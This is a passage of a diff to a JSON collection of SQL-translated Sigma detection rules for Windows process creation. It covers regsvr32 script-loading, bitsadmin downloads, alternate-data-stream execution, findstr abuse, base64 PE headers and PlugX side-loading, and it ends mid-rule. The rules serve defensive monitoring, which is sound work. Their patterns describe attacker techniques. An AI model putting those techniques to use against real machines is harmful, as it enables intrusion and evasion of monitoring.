"proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", - "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "File Download Via Bitsadmin", + "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", + "status": "test", + "description": "Detects usage of bitsadmin downloading a file", + "author": "Michael Haag, FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Some legitimate apps use this, but limited." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_bitsadmin_download.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Execute From Alternate Data Streams", + "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "status": "test", + "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1485" - ], - "falsepositives": [ - "System administrator usage" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.t1564.004" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" - }, - { - "title": "Suspicious SysAidServer Child", - "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", - "status": "experimental", - "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" + "filename": "proc_creation_win_susp_alternate_data_streams.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", - "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "status": "test", + "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "Suspicious Copy From or To System32", - "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "title": "Abusing Findstr for Defense Evasion", + "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", "status": "test", - "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", - "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", + "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1218", + "attack.t1564.004", + "attack.t1552.001", + "attack.t1105" ], "falsepositives": [ - "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", - "When cmd.exe and xcopy.exe are called directly", - "When the command contains the keywords but not in the correct order" + "Administrative findstr usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR NewProcessName LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_copy_system32.yml" + "filename": "proc_creation_win_lolbin_findstr.yml" }, { - "title": "Suspicious Child Process Created as System", - "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", - "status": "test", - "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", - "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "status": "experimental", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.002" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_child_process_as_system_.yml" + "filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.005" + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.s0013", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious ScreenSave Change by Reg.exe", - "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", + "title": "Hardware Model Reconnaissance Via Wmic.EXE", + "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", - "tags": [ - "attack.privilege_escalation", - "attack.t1546.002" - ], - "falsepositives": [ - "GPO" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_reg_screensaver.yml" - }, - { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", - "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", + "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_wmic_recon_csproduct.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE 